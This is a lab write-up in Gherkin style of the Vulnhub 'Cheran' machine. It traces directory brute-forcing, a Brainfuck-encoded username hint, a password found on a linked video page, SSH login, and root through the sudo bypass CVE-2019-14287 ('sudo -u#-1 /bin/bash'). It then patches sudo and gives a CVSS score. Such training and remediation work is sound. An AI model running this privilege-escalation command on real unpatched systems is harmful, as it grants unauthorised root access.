## Version 1.4.1
## language: en

Feature:
  TOE:
    vulnhub
  Location:
    http://10.0.4.2
  CWE:
    CWE-288: Authentication Bypass Using an Alternate Path or Channel
  Rule:
    REQ.R122: Validate credential ownership
  Goal:
    Gain root access
  Recommendation:
    Upgrade sudo

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | kali linux      | 2020.03     |
    | virtualbox      | 6.1         |
    | firefox         | 68.10.Oesr  |
    | netdiscover     | 0.7         |
    | nmap            | 7.8         |
    | wfuzz           | 2.4.5       |
    | dirb            | 2.22        |
    | wget            | 1.20.3      |
  TOE information:
    Given I am accessing the cheran vulhub machine in a Nat Network at
    """
    http://10.0.4.2/
    """
    And the server is running ubuntu 18.04 on virtualbox

  Scenario:
    Given I access 'http://10.0.4.2' using the webbrowser
    And I see an html page with some text

  Scenario: Static detection
    Given I access the html code
    And I try to brute force some URIs using dirb getting the path
    """
    http://10.0.4.2/users
    """
    Then Inside that directory is the url
    """
    http://10.0.4.2/users/Rajasimha.html
    """
    And I found the code
    """
    7 <body>
    8 Find me...
    9 </body>
    """
    When I scroll down I found the next comment
    """
    105 <!--
    106
    107 +++++ +++[- >++++ ++++< ]>+++ .<+++ +++[- >++++ ++<]> +++++ +++.- .----
    108 ---.< +++[- >+++< ]>++. <++++ [->-- --<]> -.<++ ++[-> ++++< ]>+++ .-.<+
    109 +++++ ++[-> ----- ---<] >---- ---.< +++[- >---< ]>--- .<+++ +[->- ---<]
    110 >---. ---.+ ++.-- -.<++ +++++ +[->+ +++++ ++<]> +++++ +++++ .<+++ +[->+
    111 +++<] >++++ .+.<+ ++[-> +++<] >+.<+ +++++ +++[- >---- ----- <]>-- .<+++
    112 +++++ [->++ +++++ +<]>+ +++++ +++.< +++[- >+++< ]>+.< +++++ ++++[ ->---
    113 ----- -<]>- -.<++ +++++ ++[-> +++++ ++++< ]>+++ .<+++ [->-- -<]>- --.--
    114 -.<++ +++++ +[->- ----- --<]> ----- .<+++ ++++[ ->+++ ++++< ]>+++ +.<++
    115 +++[- >++++ +<]>+ ++++. <+++[ ->--- <]>-- ---.< +++[- >+++< ]>+++ +.---
    116 -.<++ +[->- --<]> ----. <+++[ ->+++ <]>++ +.--- ----- .<+++ ++++[ ->---
    117 ----< ]>--- ---.. .<+++ ++[-> ----- <]>-- ----- -.--- .<
    118
    119 -->
    """
    And I identify it like a programming language called brainfuck
    Then I excecute the code in a a brainfuck compilator and get
    """
    $bfi main.bf
    Congrats,

    This is the Username...
    """
    And this way I confirm the user name is 'Rajasimha'
    When dirb gave me other directory to inspect
    """
    http://10.0.4.2/youtube/
    """
    Then I look at the html code
    """
    29 <li> <a href="https://youtu.be/jQqbhtw7Faw">Please Subscribe</a> </li>"
    """
    When I follow the youtube link, I found a description with a password
    """
    Cheran_Vulnhub_User_Password
    Password : k4rur
    """
    Then I get the credentials for ssh

  Scenario: Dynamic detection
    Given I have ssh credentials
    When I connect with the ssh command
    """
    $ ssh Rajasimha@10.0.4.2
    """
    Then I get logged into the cheran vulnhub machine

  Scenario: Exploitation
    Given I have access to the system
    Then I can execute the command:
    """
    $ sudo -l
    """
    And I get the output:
    """
    Matching Defaults entries for Rajasimha on ubuntu:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\
        :/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User Rajasimha may run the following commands on ubuntu:
        (ALL, !root) /bin/bash
    """
    Then I found cve-2019-14287
    When I execute the command
    """
    $ sudo -u#-1 /bin/bash
    """
    Then I have gained root access

  Scenario: Remediation
    Given the sudo version is outdated
    And is necesary to update it
    Then I execute the command
    """
    $ apt upgrade sudo
    """
    When I run the exploit with command
    """
    $ sudo -u#-1 /bin/bash
    """
    And I get
    """
    sudo: unknown user: #-1
    sudo: unable to initialize policy plugin
    """
    Then I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.8/10 (High) - AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.4/10 (High) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.9/10 (High) - CR:H/IR:H/AR:H/MAV:L/MAC:L/MPR:L/MUI:R/MS:C/MC:H/MI:H/MA:H

  Scenario: Correlations
    No correlations have been found to this date {2020-09-21}
